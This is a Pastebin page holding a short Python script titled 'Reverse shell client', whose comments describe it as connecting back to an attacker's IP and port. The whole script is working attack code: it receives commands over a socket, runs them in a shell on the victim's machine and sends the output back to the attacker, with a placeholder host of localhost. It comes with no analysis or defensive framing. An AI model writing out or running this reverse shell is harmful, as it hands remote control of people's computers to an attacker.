Adm1n_0v3rride

Reverse shell client

Jul 28th, 2018
211
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. import socket
  2. import subprocess, os
  3.  
  4. HOST = "localhost"  # attacker's IP adress (this is a random one, just to show you)
  5. PORT = 12345 # attacker's port on which server is listening
  6.  
  7. # same syntax here as for the server
  8. connexion_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  9. connexion_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
  10. connexion_socket.connect((HOST, PORT))
  11. print("\n[*] Connected to " +HOST+ " on port " +str(PORT)+ ".\n")
  12.  
  13. while True:
  14.    
  15.     command = connexion_socket.recv(1024)
  16.     split_command = command.split()
  17.     print("Received command : " +command)
  18.  
  19.     # if its quit, then break out and close socket
  20.     if command == "quit":
  21.         break
  22.  
  23.     if(command.split()[0] == "cd"):
  24.             if len(command.split()) == 1:
  25.                 connexion_socket.send((os.getcwd()))
  26.             elif len(command.split()) == 2:
  27.                 try:
  28.                     os.chdir(command.split()[1])
  29.                     connexion_socket.send(("Changed directory to " + os.getcwd()))
  30.                 except(WindowsError):
  31.                     connexion_socket.send(str.encode("No such directory : " +os.getcwd()))
  32.  
  33.     else:
  34.         # do shell command
  35.         proc = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
  36.         # read output
  37.         stdout_value = proc.stdout.read() + proc.stderr.read()
  38.         print(stdout_value + "\n")
  39.         # send output to attacker
  40.         if(stdout_value != ""):
  41.             connexion_socket.send(stdout_value)  # renvoit l'output  à l'attaquant
  42.         else:
  43.             connexion_socket.send(command+ " does not return anything")
  44.  
  45.  
  46. connexion_socket.close()
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×